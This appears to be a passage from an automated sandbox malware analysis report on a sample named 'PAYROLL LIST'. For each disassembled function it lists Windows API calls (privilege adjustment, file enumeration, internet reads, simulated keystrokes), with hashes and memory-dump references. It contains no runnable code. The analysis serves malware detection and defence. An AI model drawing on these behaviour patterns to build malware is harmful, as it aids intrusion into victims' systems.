WSAGetLastError.WSOCK32(00000000,00000000), ref: 00A792B9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 48f26024ab397515160a6e0bdbeafc4902c079822ed92d10ca22ae68db9cf5cf
Instruction ID: f6cbfbcd764bcfff00b171e8270ec6f3bdbb2f44c905257e779c03ed23bff64f
Opcode Fuzzy Hash: 48f26024ab397515160a6e0bdbeafc4902c079822ed92d10ca22ae68db9cf5cf
Instruction Fuzzy Hash: F341AD70600210AFDB14AF688D82E7EB7EDEF48724F14845DF956AB2D2DB749D018B91

Function 00A6EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A6EB8A
_wcscmp.LIBCMT ref: 00A6EBBA
_wcscmp.LIBCMT ref: 00A6EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 00A6EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A6EC0E

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: a93df0be884e906265074fe42925fb62a2eea62023447e2d7f69d86a62cf4ee5
Instruction ID: cc4dc43d46511713ee16bc7c8d53a342a67dab983ef955ab6ff1201a182aaf0f
Opcode Fuzzy Hash: a93df0be884e906265074fe42925fb62a2eea62023447e2d7f69d86a62cf4ee5
Instruction Fuzzy Hash: 3141BB396003029FCB08DF68C491AAAB3F4FF49324F10855EF95A8B3A1DB31AD45CB91

Function 00A88111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A88160
IsWindowEnabled.USER32 ref: 00A8816E
GetForegroundWindow.USER32(?,?,00000001), ref: 00A8817B
IsIconic.USER32 ref: 00A88189
IsZoomed.USER32 ref: 00A88197

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 27c7c5366ee04b6d4c32cc4e0ae79129c981d061a9b572294518f02e2eca7723
Instruction ID: 556e4d23453d77397a0df7651a7189dc95870a9d9dffb7aedbce4d6ba4e03b90
Opcode Fuzzy Hash: 27c7c5366ee04b6d4c32cc4e0ae79129c981d061a9b572294518f02e2eca7723
Instruction Fuzzy Hash: FE118F317002116FE7217F66DC48B6FBBADEF55760B444529F88AD7281CF38A90387A4

Function 00A29B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00A29EA7
VUUU, xrefs: 00AABE14
ERCP, xrefs: 00A29C32
VUUU, xrefs: 00A29E95
VUUU, xrefs: 00A29ED4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 930bac48e4fe09cf1b55a11788318cc5f484a1682c7276a56872216ef19e8cb3
Instruction ID: 301f8ffa5e5340c223d58a863ac22763b1cb47c420ebe8ff4397b835dae8da6a
Opcode Fuzzy Hash: 930bac48e4fe09cf1b55a11788318cc5f484a1682c7276a56872216ef19e8cb3
Instruction Fuzzy Hash: 7D929F71E0022ACBEF24CF5CD9407EEB7B1BB55714F1481AAE816AB281D7719D81CF91

Function 00A3E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A3E014,76230AE0,00A3DEF1,00ABDC38,?,?), ref: 00A3E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A3E03E

Strings

kernel32.dll, xrefs: 00A3E027
GetNativeSystemInfo, xrefs: 00A3E038

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: be9df2c20bc06cb6b9e2c929964f9c085752b17b3a96a543410e45908ad1eea2
Instruction ID: 4360fbbb2354f214dbaa1290f1752d9735de83ffbb691b6aae787e7aee54b4a3
Opcode Fuzzy Hash: be9df2c20bc06cb6b9e2c929964f9c085752b17b3a96a543410e45908ad1eea2
Instruction Fuzzy Hash: AED05E30440713AEC7258BA0E8097527BD4BB12300F18491AE4C392690DBB4C881CF50

Function 00A613CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00A613DC

Strings

|, xrefs: 00A6140C
(, xrefs: 00A61422

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 45bcd5d4a0d31b7a18c7c43ad800c74cdf9328cd58236ed4d60a89d8431c43d7
Instruction ID: efddb6f80b643161c65da5af99e12d5b726f7696085e9de9f6c0f607757a2962
Opcode Fuzzy Hash: 45bcd5d4a0d31b7a18c7c43ad800c74cdf9328cd58236ed4d60a89d8431c43d7
Instruction Fuzzy Hash: 8A3215B5A007059FCB28CF69C48096ABBF0FF48310B55C56EE59ADB3A1E770E941CB44

Function 00A3B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 00A3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00A3B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 00A3B22F

Part of subcall function 00A3B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A3B5A5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 716ef8210bbf850c027e993de569a53e26495e6fde5c10c8ce808febf46eb71e
Instruction ID: 330e0b97d09fc8f0f48ddf888f6cd3a398b081010e434684cc1be0bfcdefca57
Opcode Fuzzy Hash: 716ef8210bbf850c027e993de569a53e26495e6fde5c10c8ce808febf46eb71e
Instruction Fuzzy Hash: 3DA15970634015BEDF28EFAA5D8ADFF29AEEB85340F104319F602DA592DB259C019372

Function 00A74EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00A743BF,00000000), ref: 00A74FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00A74FD2

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: bb64108162493e522193f933e86cbbd6ebb72247197017f5e3fc5696b275168d
Instruction ID: f4aacff6a977b36375b0eadc218e4b8575581319acf5340386812fdbc4be0fc1
Opcode Fuzzy Hash: bb64108162493e522193f933e86cbbd6ebb72247197017f5e3fc5696b275168d
Instruction Fuzzy Hash: 4741C972904609BFEB11DF94CD85EBFB7BCEB44754F10C02EF609A6181D7B19E419690

Function 00A6E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A6E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A6E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00A6E2B4

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 3742a2f6d9b9dbba6366a49d304a5d42a7aa28cbcc2bcd93a1a9b18139e2a73f
Instruction ID: 683217caa2760f75cfd2aaff0c9e069b044d0dd4221b4316fce8264662d34fdf
Opcode Fuzzy Hash: 3742a2f6d9b9dbba6366a49d304a5d42a7aa28cbcc2bcd93a1a9b18139e2a73f
Instruction Fuzzy Hash: 3F213035A00218EFCB00EFA5D995AEDBBB8FF49710F0484A9E945AB251DB319915CB50

Function 00A5B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A3F4EA: std::exception::exception.LIBCMT ref: 00A3F51E
Part of subcall function 00A3F4EA: __CxxThrowException@8.LIBCMT ref: 00A3F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A5B1AD
GetLastError.KERNEL32 ref: 00A5B1BA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 1a5ad64b448a402db3a26d0a3f9d2cc47b798ddcc07012cf2c44e1a2f4163865
Instruction ID: bc4d2d7298c3111319d273c55b3f8c0bcbc3976721bb379ed0ba1b75341e0705
Opcode Fuzzy Hash: 1a5ad64b448a402db3a26d0a3f9d2cc47b798ddcc07012cf2c44e1a2f4163865
Instruction Fuzzy Hash: A311BCB2820605AFE718EFA4DC85D2BB7BCFB44311B20852EF49697240DB70FC468B60

Function 00A66685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A666AF
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00A666EC
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A666F5

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 40b548b9dedb7b172d6c266972bad29282489d4ec83bbf4d113b4d4b1260e202
Instruction ID: 4943379969e4b99c24b16539bfeb2cec7f399201ca0850b4a7871d2bcde08aa0
Opcode Fuzzy Hash: 40b548b9dedb7b172d6c266972bad29282489d4ec83bbf4d113b4d4b1260e202
Instruction Fuzzy Hash: C4118EB1A00229BEE711CBA8DC45FAFBBBCEB09714F004656F911E7190C3B4AA0587A5

Function 00A671FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A67223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A6723A
FreeSid.ADVAPI32(?), ref: 00A6724A

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: de9f947a38e4879121b8abf09e1976669dc2fddfb3f8eded273027f20762c8c0
Instruction ID: 01ca302d8ee64bddc5d73fb1266d0ddf5190180ba9561cc25952954364920275
Opcode Fuzzy Hash: de9f947a38e4879121b8abf09e1976669dc2fddfb3f8eded273027f20762c8c0
Instruction Fuzzy Hash: 55F01776A14209BFDF04DFF4DD99AEEBBB8FF09205F104869A603E25D1E3709A458B10

Function 00A6F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A6F599
FindClose.KERNEL32(00000000), ref: 00A6F5C9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d4a84c592d2de70ba204f71c1b11b89176c9b740d3a44f3f5f0fac1690a4a952
Instruction ID: 5345fc6578247daeebfd46159dbff4c5307bd80cc7d01c951c0951868adc31c5
Opcode Fuzzy Hash: d4a84c592d2de70ba204f71c1b11b89176c9b740d3a44f3f5f0fac1690a4a952
Instruction Fuzzy Hash: FA1184716046019FDB10EF68E845A2EB7E9FF89324F00891EF8A6D7291DB30AD058B85

Function 00A6CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00A7BE6A,?,?,00000000,?), ref: 00A6CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00A7BE6A,?,?,00000000,?), ref: 00A6CEB9

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 33880b99f6e1014225c92e22505c395e3296843d686c01d64ade4ddeca61c2a8
Instruction ID: 19e89f8fbbb551afe76027c0e6c7a2d92333901e20c5d4fd37ad6446c8d85c7a
Opcode Fuzzy Hash: 33880b99f6e1014225c92e22505c395e3296843d686c01d64ade4ddeca61c2a8
Instruction Fuzzy Hash: 07F0EC7100022AABDB20ABA4DC48FFA337CBF093A0F008126F84AD6081C7709A00CBA0

Function 00A6411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A64153
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00A64166

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 2a8f729950117635f9b944ba86afba79e93e67527c20df53b33a21e3cbde2e45
Instruction ID: d6db9597c04f9fb0b70f08a75e84e31def170019cc42eb0025f801bb60aa82f8
Opcode Fuzzy Hash: 2a8f729950117635f9b944ba86afba79e93e67527c20df53b33a21e3cbde2e45
Instruction Fuzzy Hash: ECF01D7090424EAFDB05DFA4C805BBE7BB4EF05309F04840AF9A696191D77986169FA4

Function 00A5AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A5ACC0), ref: 00A5AB99
CloseHandle.KERNEL32(?,?,00A5ACC0), ref: 00A5ABAB

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 2ba4d9909e7e92dee1d0b4c3b20474a652ddd7360731f4fd171e2c7c3e004374
Instruction ID: 72a9f1e1164f4bb574d4925a241cfbc16a2dae5ef9a6ab3f0c4c72d71632c8cd
Opcode Fuzzy Hash: 2ba4d9909e7e92dee1d0b4c3b20474a652ddd7360731f4fd171e2c7c3e004374
Instruction Fuzzy Hash: 4AE0E675410511AFE7252F54ED05D777BE9EF04321B108529F89B81870D7735D91DB50

Function 00A481AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00A46DB3,-0000031A,?,?,00000001), ref: 00A481B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A481BA

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 25b6ff2c16bf85e73dc88b017e935d57861fce40c0e6fdfb80af9b048f0ce691
Instruction ID: d456cb400b503eabdb704fad38b842be7330031c59e37911f47ef2cc2b4fa5c1
Opcode Fuzzy Hash: 25b6ff2c16bf85e73dc88b017e935d57861fce40c0e6fdfb80af9b048f0ce691
Instruction Fuzzy Hash: 04B09231044609ABDF00ABE1EC09B687F68EB0A652F004010F64E488A18B7254128BA2

Function 00A277B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A27921

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a20000_PAYROLL LIST.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d5370626fedf888e47fcf71119a2a04336adfdf5dd1f3fa09410d2e77c887e44
Instruction ID: fd68e7d64d68a5281a47ed93f1bafff07dd73256722e66c35d9f9c98206ae631
Opcode Fuzzy Hash: d5370626fedf888e47fcf71119a2a04336adfdf5dd1f3fa09410d2e77c887e44
Instruction Fuzzy Hash: 14A25C70E05229CFDB24CF68D4806ADBBB1FF49314F2581A9E859AB390D7349E81DB90

Function 00A27FA3 Relevance: 2.3, APIs: 1, Instructions: 796COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A27921

Memory Dump Source

Source File: 00000000.00000002.2133056064.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000000.00000002.2132896459.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000AAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133295886.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133703615.0000000000ADA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133732402.0000000000AE4000.00000002.00000001.01000000.00000003.sdmpDownload File

